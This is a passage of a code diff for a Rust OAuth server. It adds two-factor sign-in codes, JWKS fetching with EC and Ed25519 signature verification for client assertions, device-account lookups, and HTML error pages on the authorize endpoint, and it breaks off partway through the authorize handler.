··· 443 ) 444 .await 445 } 446 + 447 + pub async fn enqueue_2fa_code( 448 + db: &PgPool, 449 + user_id: Uuid, 450 + code: &str, 451 + hostname: &str, 452 + ) -> Result<Uuid, sqlx::Error> { 453 + let prefs = get_user_notification_prefs(db, user_id).await?; 454 + 455 + let body = format!( 456 + "Hello @{},\n\nYour sign-in verification code is: {}\n\nThis code will expire in 10 minutes.\n\nIf you did not request this, please secure your account immediately.", 457 + prefs.handle, code 458 + ); 459 + 460 + enqueue_notification( 461 + db, 462 + NewNotification::new( 463 + user_id, 464 + prefs.channel, 465 + super::types::NotificationType::TwoFactorCode, 466 + prefs.email.clone(), 467 + Some(format!("Sign-in Verification - {}", hostname)), 468 + body, 469 + ), 470 + ) 471 + .await 472 + } 473 + 474 + pub fn channel_display_name(channel: NotificationChannel) -> &'static str { 475 + match channel { 476 + NotificationChannel::Email => "email", 477 + NotificationChannel::Discord => "Discord", 478 + NotificationChannel::Telegram => "Telegram", 479 + NotificationChannel::Signal => "Signal", 480 + } 481 + }
+1
src/notifications/types.rs
··· 31 AccountDeletion, 32 AdminEmail, 33 PlcOperation, 34 } 35 36 #[derive(Debug, Clone, FromRow)]
··· 31 AccountDeletion, 32 AdminEmail, 33 PlcOperation, 34 + TwoFactorCode, 35 } 36 37 #[derive(Debug, Clone, FromRow)]
+267 -7
src/oauth/client.rs
··· 57 #[derive(Clone)] 58 pub struct ClientMetadataCache { 59 cache: Arc<RwLock<HashMap<String, CachedMetadata>>>, 60 http_client: Client, 61 cache_ttl_secs: u64, 62 } ··· 66 cached_at: std::time::Instant, 67 } 68 69 impl ClientMetadataCache { 70 pub fn new(cache_ttl_secs: u64) -> Self { 71 Self { 72 cache: Arc::new(RwLock::new(HashMap::new())), 73 - http_client: Client::new(), 74 cache_ttl_secs, 75 } 76 } ··· 101 Ok(metadata) 102 } 103 104 async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> { 105 if !client_id.starts_with("http://") && !client_id.starts_with("https://") { 106 return Err(OAuthError::InvalidClient( ··· 244 } 245 } 246 247 - pub fn verify_client_auth( 248 metadata: &ClientMetadata, 249 client_auth: &super::ClientAuth, 250 ) -> Result<(), OAuthError> { ··· 258 )), 259 260 ("private_key_jwt", super::ClientAuth::PrivateKeyJwt { client_assertion }) => { 261 - verify_private_key_jwt(metadata, client_assertion) 262 } 263 264 ("private_key_jwt", _) => Err(OAuthError::InvalidClient( ··· 284 } 285 } 286 287 - fn verify_private_key_jwt( 288 metadata: &ClientMetadata, 289 client_assertion: &str, 290 ) -> Result<(), OAuthError> { ··· 311 alg 312 ))); 313 } 314 315 let payload_bytes = URL_SAFE_NO_PAD 316 .decode(parts[1]) ··· 353 } 354 } 355 356 - if metadata.jwks.is_none() && metadata.jwks_uri.is_none() { 357 return Err(OAuthError::InvalidClient( 358 - "Client using private_key_jwt must have jwks or jwks_uri".to_string(), 359 )); 360 } 361 362 Err(OAuthError::InvalidClient( 363 - "private_key_jwt signature verification not yet implemented - use 'none' auth method".to_string(), 364 )) 365 }
··· 57 #[derive(Clone)] 58 pub struct ClientMetadataCache { 59 cache: Arc<RwLock<HashMap<String, CachedMetadata>>>, 60 + jwks_cache: Arc<RwLock<HashMap<String, CachedJwks>>>, 61 http_client: Client, 62 cache_ttl_secs: u64, 63 } ··· 67 cached_at: std::time::Instant, 68 } 69 70 + struct CachedJwks { 71 + jwks: serde_json::Value, 72 + cached_at: std::time::Instant, 73 + } 74 + 75 impl ClientMetadataCache { 76 pub fn new(cache_ttl_secs: u64) -> Self { 77 Self { 78 cache: Arc::new(RwLock::new(HashMap::new())), 79 + jwks_cache: Arc::new(RwLock::new(HashMap::new())), 80 + http_client: Client::builder() 81 + .timeout(std::time::Duration::from_secs(30)) 82 + .connect_timeout(std::time::Duration::from_secs(10)) 83 + .build() 84 + .unwrap_or_else(|_| Client::new()), 85 cache_ttl_secs, 86 } 87 } ··· 112 Ok(metadata) 113 } 114 115 + pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> { 116 + if let Some(jwks) = &metadata.jwks { 117 + return Ok(jwks.clone()); 118 + } 119 + 120 + let jwks_uri = metadata.jwks_uri.as_ref().ok_or_else(|| { 121 + OAuthError::InvalidClient( 122 + "Client using private_key_jwt must have jwks or jwks_uri".to_string(), 123 + ) 124 + })?; 125 + 126 + { 127 + let cache = self.jwks_cache.read().await; 128 + if let Some(cached) = cache.get(jwks_uri) { 129 + if cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs { 130 + return Ok(cached.jwks.clone()); 131 + } 132 + } 133 + } 134 + 135 + let jwks = self.fetch_jwks(jwks_uri).await?; 136 + 137 + { 138 + let mut cache = self.jwks_cache.write().await; 139 + cache.insert( 140 + jwks_uri.clone(), 141 + CachedJwks { 142 + jwks: jwks.clone(), 143 + cached_at: std::time::Instant::now(), 144 + }, 145 + ); 146 + } 147 + 148 + Ok(jwks) 149 + } 150 + 151 + async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> { 152 + if !jwks_uri.starts_with("https://") { 153 + if !jwks_uri.starts_with("http://") 154 + || (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1")) 155 + { 156 + return Err(OAuthError::InvalidClient( 157 + "jwks_uri must use https (except for localhost)".to_string(), 158 + )); 159 + } 160 + } 161 + 162 + let response = self 163 + .http_client 164 + .get(jwks_uri) 165 + .header("Accept", "application/json") 166 + .send() 167 + .await 168 + .map_err(|e| { 169 + OAuthError::InvalidClient(format!("Failed to fetch JWKS from {}: {}", jwks_uri, e)) 170 + })?; 171 + 172 + if !response.status().is_success() { 173 + return Err(OAuthError::InvalidClient(format!( 174 + "Failed to fetch JWKS: HTTP {}", 175 + response.status() 176 + ))); 177 + } 178 + 179 + let jwks: serde_json::Value = response 180 + .json() 181 + .await 182 + .map_err(|e| OAuthError::InvalidClient(format!("Invalid JWKS JSON: {}", e)))?; 183 + 184 + if jwks.get("keys").and_then(|k| k.as_array()).is_none() { 185 + return Err(OAuthError::InvalidClient( 186 + "JWKS must contain a 'keys' array".to_string(), 187 + )); 188 + } 189 + 190 + Ok(jwks) 191 + } 192 + 193 async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> { 194 if !client_id.starts_with("http://") && !client_id.starts_with("https://") { 195 return Err(OAuthError::InvalidClient( ··· 333 } 334 } 335 336 + pub async fn verify_client_auth( 337 + cache: &ClientMetadataCache, 338 metadata: &ClientMetadata, 339 client_auth: &super::ClientAuth, 340 ) -> Result<(), OAuthError> { ··· 348 )), 349 350 ("private_key_jwt", super::ClientAuth::PrivateKeyJwt { client_assertion }) => { 351 + verify_private_key_jwt_async(cache, metadata, client_assertion).await 352 } 353 354 ("private_key_jwt", _) => Err(OAuthError::InvalidClient( ··· 374 } 375 } 376 377 + async fn verify_private_key_jwt_async( 378 + cache: &ClientMetadataCache, 379 metadata: &ClientMetadata, 380 client_assertion: &str, 381 ) -> Result<(), OAuthError> { ··· 402 alg 403 ))); 404 } 405 + 406 + let kid = header.get("kid").and_then(|k| k.as_str()); 407 408 let payload_bytes = URL_SAFE_NO_PAD 409 .decode(parts[1]) ··· 446 } 447 } 448 449 + let jwks = cache.get_jwks(metadata).await?; 450 + let keys = jwks.get("keys").and_then(|k| k.as_array()).ok_or_else(|| { 451 + OAuthError::InvalidClient("Invalid JWKS: missing keys array".to_string()) 452 + })?; 453 + 454 + let matching_keys: Vec<&serde_json::Value> = if let Some(kid) = kid { 455 + keys.iter() 456 + .filter(|k| k.get("kid").and_then(|v| v.as_str()) == Some(kid)) 457 + .collect() 458 + } else { 459 + keys.iter().collect() 460 + }; 461 + 462 + if matching_keys.is_empty() { 463 return Err(OAuthError::InvalidClient( 464 + "No matching key found in client JWKS".to_string(), 465 )); 466 } 467 468 + let signing_input = format!("{}.{}", parts[0], parts[1]); 469 + let signature_bytes = URL_SAFE_NO_PAD 470 + .decode(parts[2]) 471 + .map_err(|_| OAuthError::InvalidClient("Invalid signature encoding".to_string()))?; 472 + 473 + for key in matching_keys { 474 + let key_alg = key.get("alg").and_then(|a| a.as_str()); 475 + if key_alg.is_some() && key_alg != Some(alg) { 476 + continue; 477 + } 478 + 479 + let kty = key.get("kty").and_then(|k| k.as_str()).unwrap_or(""); 480 + 481 + let verified = match (alg, kty) { 482 + ("ES256", "EC") => verify_es256(key, &signing_input, &signature_bytes), 483 + ("ES384", "EC") => verify_es384(key, &signing_input, &signature_bytes), 484 + ("RS256" | "RS384" | "RS512", "RSA") => { 485 + verify_rsa(alg, key, &signing_input, &signature_bytes) 486 + } 487 + ("EdDSA", "OKP") => verify_eddsa(key, &signing_input, &signature_bytes), 488 + _ => continue, 489 + }; 490 + 491 + if verified.is_ok() { 492 + return Ok(()); 493 + } 494 + } 495 + 496 Err(OAuthError::InvalidClient( 497 + "client_assertion signature verification failed".to_string(), 498 + )) 499 + } 500 + 501 + fn verify_es256( 502 + key: &serde_json::Value, 503 + signing_input: &str, 504 + signature: &[u8], 505 + ) -> Result<(), OAuthError> { 506 + use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 507 + use p256::ecdsa::{Signature, VerifyingKey, signature::Verifier}; 508 + use p256::EncodedPoint; 509 + 510 + let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| { 511 + OAuthError::InvalidClient("Missing x coordinate in EC key".to_string()) 512 + })?; 513 + let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| { 514 + OAuthError::InvalidClient("Missing y coordinate in EC key".to_string()) 515 + })?; 516 + 517 + let x_bytes = URL_SAFE_NO_PAD.decode(x) 518 + .map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?; 519 + let y_bytes = URL_SAFE_NO_PAD.decode(y) 520 + .map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?; 521 + 522 + let mut point_bytes = vec![0x04]; 523 + point_bytes.extend_from_slice(&x_bytes); 524 + point_bytes.extend_from_slice(&y_bytes); 525 + 526 + let point = EncodedPoint::from_bytes(&point_bytes) 527 + .map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?; 528 + let verifying_key = VerifyingKey::from_encoded_point(&point) 529 + .map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?; 530 + 531 + let sig = Signature::from_slice(signature) 532 + .map_err(|_| OAuthError::InvalidClient("Invalid ES256 signature format".to_string()))?; 533 + 534 + verifying_key 535 + .verify(signing_input.as_bytes(), &sig) 536 + .map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string())) 537 + } 538 + 539 + fn verify_es384( 540 + key: &serde_json::Value, 541 + signing_input: &str, 542 + signature: &[u8], 543 + ) -> Result<(), OAuthError> { 544 + use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 545 + use p384::ecdsa::{Signature, VerifyingKey, signature::Verifier}; 546 + use p384::EncodedPoint; 547 + 548 + let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| { 549 + OAuthError::InvalidClient("Missing x coordinate in EC key".to_string()) 550 + })?; 551 + let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| { 552 + OAuthError::InvalidClient("Missing y coordinate in EC key".to_string()) 553 + })?; 554 + 555 + let x_bytes = URL_SAFE_NO_PAD.decode(x) 556 + .map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?; 557 + let y_bytes = URL_SAFE_NO_PAD.decode(y) 558 + .map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?; 559 + 560 + let mut point_bytes = vec![0x04]; 561 + point_bytes.extend_from_slice(&x_bytes); 562 + point_bytes.extend_from_slice(&y_bytes); 563 + 564 + let point = EncodedPoint::from_bytes(&point_bytes) 565 + .map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?; 566 + let verifying_key = VerifyingKey::from_encoded_point(&point) 567 + .map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?; 568 + 569 + let sig = Signature::from_slice(signature) 570 + .map_err(|_| OAuthError::InvalidClient("Invalid ES384 signature format".to_string()))?; 571 + 572 + verifying_key 573 + .verify(signing_input.as_bytes(), &sig) 574 + .map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string())) 575 + } 576 + 577 + fn verify_rsa( 578 + _alg: &str, 579 + _key: &serde_json::Value, 580 + _signing_input: &str, 581 + _signature: &[u8], 582 + ) -> Result<(), OAuthError> { 583 + Err(OAuthError::InvalidClient( 584 + "RSA signature verification not yet supported - use EC keys".to_string(), 585 )) 586 } 587 + 588 + fn verify_eddsa( 589 + key: &serde_json::Value, 590 + signing_input: &str, 591 + signature: &[u8], 592 + ) -> Result<(), OAuthError> { 593 + use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 594 + use ed25519_dalek::{Signature, Verifier, VerifyingKey}; 595 + 596 + let crv = key.get("crv").and_then(|c| c.as_str()).unwrap_or(""); 597 + if crv != "Ed25519" { 598 + return Err(OAuthError::InvalidClient(format!( 599 + "Unsupported EdDSA curve: {}", 600 + crv 601 + ))); 602 + } 603 + 604 + let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| { 605 + OAuthError::InvalidClient("Missing x in OKP key".to_string()) 606 + })?; 607 + 608 + let x_bytes = URL_SAFE_NO_PAD.decode(x) 609 + .map_err(|_| OAuthError::InvalidClient("Invalid x encoding".to_string()))?; 610 + 611 + let key_bytes: [u8; 32] = x_bytes.try_into() 612 + .map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key length".to_string()))?; 613 + 614 + let verifying_key = VerifyingKey::from_bytes(&key_bytes) 615 + .map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key".to_string()))?; 616 + 617 + let sig_bytes: [u8; 64] = signature.try_into() 618 + .map_err(|_| OAuthError::InvalidClient("Invalid EdDSA signature length".to_string()))?; 619 + 620 + let sig = Signature::from_bytes(&sig_bytes); 621 + 622 + verifying_key 623 + .verify(signing_input.as_bytes(), &sig) 624 + .map_err(|_| OAuthError::InvalidClient("EdDSA signature verification failed".to_string())) 625 + }
+62
src/oauth/db/device.rs
··· 1 use sqlx::PgPool; 2 3 use super::super::{DeviceData, OAuthError}; 4 5 pub async fn create_device( 6 pool: &PgPool, ··· 94 95 Ok(()) 96 }
··· 1 + use chrono::{DateTime, Utc}; 2 use sqlx::PgPool; 3 4 use super::super::{DeviceData, OAuthError}; 5 + 6 + pub struct DeviceAccountRow { 7 + pub did: String, 8 + pub handle: String, 9 + pub email: String, 10 + pub last_used_at: DateTime<Utc>, 11 + } 12 13 pub async fn create_device( 14 pool: &PgPool, ··· 102 103 Ok(()) 104 } 105 + 106 + pub async fn get_device_accounts( 107 + pool: &PgPool, 108 + device_id: &str, 109 + ) -> Result<Vec<DeviceAccountRow>, OAuthError> { 110 + let rows = sqlx::query!( 111 + r#" 112 + SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at 113 + FROM oauth_account_device ad 114 + JOIN users u ON u.did = ad.did 115 + WHERE ad.device_id = $1 116 + AND u.deactivated_at IS NULL 117 + AND u.takedown_ref IS NULL 118 + ORDER BY ad.updated_at DESC 119 + "#, 120 + device_id 121 + ) 122 + .fetch_all(pool) 123 + .await?; 124 + 125 + Ok(rows 126 + .into_iter() 127 + .map(|r| DeviceAccountRow { 128 + did: r.did, 129 + handle: r.handle, 130 + email: r.email, 131 + last_used_at: r.last_used_at, 132 + }) 133 + .collect()) 134 + } 135 + 136 + pub async fn verify_account_on_device( 137 + pool: &PgPool, 138 + device_id: &str, 139 + did: &str, 140 + ) -> Result<bool, OAuthError> { 141 + let row = sqlx::query!( 142 + r#" 143 + SELECT 1 as exists 144 + FROM oauth_account_device ad 145 + JOIN users u ON u.did = ad.did 146 + WHERE ad.device_id = $1 147 + AND ad.did = $2 148 + AND u.deactivated_at IS NULL 149 + AND u.takedown_ref IS NULL 150 + "#, 151 + device_id, 152 + did 153 + ) 154 + .fetch_optional(pool) 155 + .await?; 156 + 157 + Ok(row.is_some()) 158 + }
+8 -1
src/oauth/db/mod.rs
··· 4 mod helpers; 5 mod request; 6 mod token; 7 8 pub use client::{get_authorized_client, upsert_authorized_client}; 9 pub use device::{ 10 - create_device, delete_device, get_device, update_device_last_seen, upsert_account_device, 11 }; 12 pub use dpop::{check_and_record_dpop_jti, cleanup_expired_dpop_jtis}; 13 pub use request::{ ··· 20 delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id, 21 get_token_by_refresh_token, list_tokens_for_user, rotate_token, 22 };
··· 4 mod helpers; 5 mod request; 6 mod token; 7 + mod two_factor; 8 9 pub use client::{get_authorized_client, upsert_authorized_client}; 10 pub use device::{ 11 + create_device, delete_device, get_device, get_device_accounts, update_device_last_seen, 12 + upsert_account_device, verify_account_on_device, DeviceAccountRow, 13 }; 14 pub use dpop::{check_and_record_dpop_jti, cleanup_expired_dpop_jtis}; 15 pub use request::{ ··· 22 delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id, 23 get_token_by_refresh_token, list_tokens_for_user, rotate_token, 24 }; 25 + pub use two_factor::{ 26 + check_user_2fa_enabled, cleanup_expired_2fa_challenges, create_2fa_challenge, 27 + delete_2fa_challenge, delete_2fa_challenge_by_request_uri, generate_2fa_code, 28 + get_2fa_challenge, increment_2fa_attempts, TwoFactorChallenge, 29 + };
+153
src/oauth/db/two_factor.rs
···
··· 1 + use chrono::{DateTime, Duration, Utc}; 2 + use rand::Rng; 3 + use sqlx::PgPool; 4 + use uuid::Uuid; 5 + 6 + use super::super::OAuthError; 7 + 8 + pub struct TwoFactorChallenge { 9 + pub id: Uuid, 10 + pub did: String, 11 + pub request_uri: String, 12 + pub code: String, 13 + pub attempts: i32, 14 + pub created_at: DateTime<Utc>, 15 + pub expires_at: DateTime<Utc>, 16 + } 17 + 18 + pub fn generate_2fa_code() -> String { 19 + let mut rng = rand::thread_rng(); 20 + let code: u32 = rng.gen_range(0..1_000_000); 21 + format!("{:06}", code) 22 + } 23 + 24 + pub async fn create_2fa_challenge( 25 + pool: &PgPool, 26 + did: &str, 27 + request_uri: &str, 28 + ) -> Result<TwoFactorChallenge, OAuthError> { 29 + let code = generate_2fa_code(); 30 + let expires_at = Utc::now() + Duration::minutes(10); 31 + 32 + let row = sqlx::query!( 33 + r#" 34 + INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at) 35 + VALUES ($1, $2, $3, $4) 36 + RETURNING id, did, request_uri, code, attempts, created_at, expires_at 37 + "#, 38 + did, 39 + request_uri, 40 + code, 41 + expires_at, 42 + ) 43 + .fetch_one(pool) 44 + .await?; 45 + 46 + Ok(TwoFactorChallenge { 47 + id: row.id, 48 + did: row.did, 49 + request_uri: row.request_uri, 50 + code: row.code, 51 + attempts: row.attempts, 52 + created_at: row.created_at, 53 + expires_at: row.expires_at, 54 + }) 55 + } 56 + 57 + pub async fn get_2fa_challenge( 58 + pool: &PgPool, 59 + request_uri: &str, 60 + ) -> Result<Option<TwoFactorChallenge>, OAuthError> { 61 + let row = sqlx::query!( 62 + r#" 63 + SELECT id, did, request_uri, code, attempts, created_at, expires_at 64 + FROM oauth_2fa_challenge 65 + WHERE request_uri = $1 66 + "#, 67 + request_uri 68 + ) 69 + .fetch_optional(pool) 70 + .await?; 71 + 72 + Ok(row.map(|r| TwoFactorChallenge { 73 + id: r.id, 74 + did: r.did, 75 + request_uri: r.request_uri, 76 + code: r.code, 77 + attempts: r.attempts, 78 + created_at: r.created_at, 79 + expires_at: r.expires_at, 80 + })) 81 + } 82 + 83 + pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> { 84 + let row = sqlx::query!( 85 + r#" 86 + UPDATE oauth_2fa_challenge 87 + SET attempts = attempts + 1 88 + WHERE id = $1 89 + RETURNING attempts 90 + "#, 91 + id 92 + ) 93 + .fetch_one(pool) 94 + .await?; 95 + 96 + Ok(row.attempts) 97 + } 98 + 99 + pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> { 100 + sqlx::query!( 101 + r#" 102 + DELETE FROM oauth_2fa_challenge WHERE id = $1 103 + "#, 104 + id 105 + ) 106 + .execute(pool) 107 + .await?; 108 + 109 + Ok(()) 110 + } 111 + 112 + pub async fn delete_2fa_challenge_by_request_uri( 113 + pool: &PgPool, 114 + request_uri: &str, 115 + ) -> Result<(), OAuthError> { 116 + sqlx::query!( 117 + r#" 118 + DELETE FROM oauth_2fa_challenge WHERE request_uri = $1 119 + "#, 120 + request_uri 121 + ) 122 + .execute(pool) 123 + .await?; 124 + 125 + Ok(()) 126 + } 127 + 128 + pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> { 129 + let result = sqlx::query!( 130 + r#" 131 + DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW() 132 + "# 133 + ) 134 + .execute(pool) 135 + .await?; 136 + 137 + Ok(result.rows_affected()) 138 + } 139 + 140 + pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> { 141 + let row = sqlx::query!( 142 + r#" 143 + SELECT two_factor_enabled 144 + FROM users 145 + WHERE did = $1 146 + "#, 147 + did 148 + ) 149 + .fetch_optional(pool) 150 + .await?; 151 + 152 + Ok(row.map(|r| r.two_factor_enabled).unwrap_or(false)) 153 + }
+678 -35
src/oauth/endpoints/authorize.rs
··· 1 use axum::{ 2 Form, Json, 3 extract::{Query, State}, 4 - http::HeaderMap, 5 - response::{IntoResponse, Redirect, Response}, 6 }; 7 use chrono::Utc; 8 use serde::{Deserialize, Serialize}; 9 use urlencoding::encode as url_encode; 10 11 use crate::state::AppState; 12 - use crate::oauth::{Code, DeviceData, DeviceId, OAuthError, SessionId, db}; 13 14 fn extract_client_ip(headers: &HeaderMap) -> String { 15 if let Some(forwarded) = headers.get("x-forwarded-for") { ··· 36 .map(|s| s.to_string()) 37 } 38 39 #[derive(Debug, Deserialize)] 40 pub struct AuthorizeQuery { 41 pub request_uri: Option<String>, 42 pub client_id: Option<String>, 43 } 44 45 #[derive(Debug, Serialize)] ··· 61 pub remember_device: bool, 62 } 63 64 pub async fn authorize_get( 65 State(state): State<AppState>, 66 Query(query): Query<AuthorizeQuery>, 67 ) -> Result<Json<AuthorizeResponse>, OAuthError> { 68 let request_uri = query.request_uri.ok_or_else(|| { ··· 92 State(state): State<AppState>, 93 headers: HeaderMap, 94 Form(form): Form<AuthorizeSubmit>, 95 - ) -> Result<Response, OAuthError> { 96 - let request_data = db::get_authorization_request(&state.db, &form.request_uri) 97 - .await? 98 - .ok_or_else(|| OAuthError::InvalidRequest("Invalid or expired request_uri".to_string()))?; 99 100 if request_data.expires_at < Utc::now() { 101 - db::delete_authorization_request(&state.db, &form.request_uri).await?; 102 - return Err(OAuthError::InvalidRequest("request_uri has expired".to_string())); 103 } 104 105 - let user = sqlx::query!( 106 r#" 107 - SELECT did, password_hash, deactivated_at, takedown_ref 108 FROM users 109 WHERE handle = $1 OR email = $1 110 "#, ··· 112 ) 113 .fetch_optional(&state.db) 114 .await 115 - .map_err(|e| OAuthError::ServerError(e.to_string()))? 116 - .ok_or_else(|| OAuthError::AccessDenied("Invalid credentials".to_string()))?; 117 118 if user.deactivated_at.is_some() { 119 - return Err(OAuthError::AccessDenied("Account is deactivated".to_string())); 120 } 121 122 if user.takedown_ref.is_some() { 123 - return Err(OAuthError::AccessDenied("Account is taken down".to_string())); 124 } 125 126 - let password_valid = bcrypt::verify(&form.password, &user.password_hash) 127 - .map_err(|_| OAuthError::ServerError("Password verification failed".to_string()))?; 128 129 if !password_valid { 130 - return Err(OAuthError::AccessDenied("Invalid credentials".to_string())); 131 } 132 133 let code = Code::generate(); 134 - let mut device_id: Option<String> = None; 135 136 if form.remember_device { 137 - let new_device_id = DeviceId::generate(); 138 - let device_data = DeviceData { 139 - session_id: SessionId::generate().0, 140 - user_agent: extract_user_agent(&headers), 141 - ip_address: extract_client_ip(&headers), 142 - last_seen_at: Utc::now(), 143 }; 144 145 - db::create_device(&state.db, &new_device_id.0, &device_data).await?; 146 - db::upsert_account_device(&state.db, &user.did, &new_device_id.0).await?; 147 - device_id = Some(new_device_id.0); 148 } 149 150 - db::update_authorization_request( 151 &state.db, 152 &form.request_uri, 153 &user.did, 154 device_id.as_deref(), 155 &code.0, 156 ) 157 - .await?; 158 159 - let redirect_uri = &request_data.parameters.redirect_uri; 160 let mut redirect_url = redirect_uri.to_string(); 161 162 let separator = if redirect_url.contains('?') { '&' } else { '?' }; 163 redirect_url.push(separator); 164 - redirect_url.push_str(&format!("code={}", url_encode(&code.0))); 165 166 - if let Some(state) = &request_data.parameters.state { 167 - redirect_url.push_str(&format!("&state={}", url_encode(state))); 168 } 169 170 let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 171 redirect_url.push_str(&format!("&iss={}", url_encode(&format!("https://{}", pds_hostname)))); 172 173 - Ok(Redirect::temporary(&redirect_url).into_response()) 174 } 175 176 #[derive(Debug, Serialize)] ··· 208 pub struct AuthorizeDenyForm { 209 pub request_uri: String, 210 }
··· 1 use axum::{ 2 Form, Json, 3 extract::{Query, State}, 4 + http::{HeaderMap, header::SET_COOKIE}, 5 + response::{IntoResponse, Redirect, Response, Html}, 6 }; 7 use chrono::Utc; 8 use serde::{Deserialize, Serialize}; 9 + use subtle::ConstantTimeEq; 10 use urlencoding::encode as url_encode; 11 12 use crate::state::AppState; 13 + use crate::oauth::{Code, DeviceAccount, DeviceData, DeviceId, OAuthError, SessionId, db, templates}; 14 + use crate::notifications::{NotificationChannel, channel_display_name, enqueue_2fa_code}; 15 + 16 + const DEVICE_COOKIE_NAME: &str = "oauth_device_id"; 17 + 18 + fn extract_device_cookie(headers: &HeaderMap) -> Option<String> { 19 + headers 20 + .get("cookie") 21 + .and_then(|v| v.to_str().ok()) 22 + .and_then(|cookie_str| { 23 + for cookie in cookie_str.split(';') { 24 + let cookie = cookie.trim(); 25 + if let Some(value) = cookie.strip_prefix(&format!("{}=", DEVICE_COOKIE_NAME)) { 26 + return Some(value.to_string()); 27 + } 28 + } 29 + None 30 + }) 31 + } 32 33 fn extract_client_ip(headers: &HeaderMap) -> String { 34 if let Some(forwarded) = headers.get("x-forwarded-for") { ··· 55 .map(|s| s.to_string()) 56 } 57 58 + fn make_device_cookie(device_id: &str) -> String { 59 + format!( 60 + "{}={}; Path=/oauth; HttpOnly; Secure; SameSite=Lax; Max-Age=31536000", 61 + DEVICE_COOKIE_NAME, 62 + device_id 63 + ) 64 + } 65 + 66 #[derive(Debug, Deserialize)] 67 pub struct AuthorizeQuery { 68 pub request_uri: Option<String>, 69 pub client_id: Option<String>, 70 + pub new_account: Option<bool>, 71 } 72 73 #[derive(Debug, Serialize)] ··· 89 pub remember_device: bool, 90 } 91 92 + #[derive(Debug, Deserialize)] 93 + pub struct AuthorizeSelectSubmit { 94 + pub request_uri: String, 95 + pub did: String, 96 + } 97 + 98 + fn wants_json(headers: &HeaderMap) -> bool { 99 + headers 100 + .get("accept") 101 + .and_then(|v| v.to_str().ok()) 102 + .map(|accept| accept.contains("application/json")) 103 + .unwrap_or(false) 104 + } 105 + 106 pub async fn authorize_get( 107 State(state): State<AppState>, 108 + headers: HeaderMap, 109 + Query(query): Query<AuthorizeQuery>, 110 + ) -> Response { 111 + let request_uri = match query.request_uri { 112 + Some(uri) => uri, 113 + None => { 114 + if wants_json(&headers) { 115 + return ( 116 + axum::http::StatusCode::BAD_REQUEST, 117 + Json(serde_json::json!({ 118 + "error": "invalid_request", 119 + "error_description": "Missing request_uri parameter. Use PAR to initiate authorization." 120 + })), 121 + ).into_response(); 122 + } 123 + return ( 124 + axum::http::StatusCode::BAD_REQUEST, 125 + Html(templates::error_page( 126 + "invalid_request", 127 + Some("Missing request_uri parameter. Use PAR to initiate authorization."), 128 + )), 129 + ).into_response(); 130 + } 131 + }; 132 + 133 + let request_data = match db::get_authorization_request(&state.db, &request_uri).await { 134 + Ok(Some(data)) => data, 135 + Ok(None) => { 136 + if wants_json(&headers) { 137 + return ( 138 + axum::http::StatusCode::BAD_REQUEST, 139 + Json(serde_json::json!({ 140 + "error": "invalid_request", 141 + "error_description": "Invalid or expired request_uri. Please start a new authorization request." 142 + })), 143 + ).into_response(); 144 + } 145 + return ( 146 + axum::http::StatusCode::BAD_REQUEST, 147 + Html(templates::error_page( 148 + "invalid_request", 149 + Some("Invalid or expired request_uri. Please start a new authorization request."), 150 + )), 151 + ).into_response(); 152 + } 153 + Err(e) => { 154 + if wants_json(&headers) { 155 + return ( 156 + axum::http::StatusCode::INTERNAL_SERVER_ERROR, 157 + Json(serde_json::json!({ 158 + "error": "server_error", 159 + "error_description": format!("Database error: {:?}", e) 160 + })), 161 + ).into_response(); 162 + } 163 + return ( 164 + axum::http::StatusCode::INTERNAL_SERVER_ERROR, 165 + Html(templates::error_page( 166 + "server_error", 167 + Some(&format!("Database error: {:?}", e)), 168 + )), 169 + ).into_response(); 170 + } 171 + }; 172 + 173 + if request_data.expires_at < Utc::now() { 174 + let _ = db::delete_authorization_request(&state.db, &request_uri).await; 175 + if wants_json(&headers) { 176 + return ( 177 + axum::http::StatusCode::BAD_REQUEST, 178 + Json(serde_json::json!({ 179 + "error": "invalid_request", 180 + "error_description": "Authorization request has expired. Please start a new request." 181 + })), 182 + ).into_response(); 183 + } 184 + return ( 185 + axum::http::StatusCode::BAD_REQUEST, 186 + Html(templates::error_page( 187 + "invalid_request", 188 + Some("Authorization request has expired. Please start a new request."), 189 + )), 190 + ).into_response(); 191 + } 192 + 193 + if wants_json(&headers) { 194 + return Json(AuthorizeResponse { 195 + 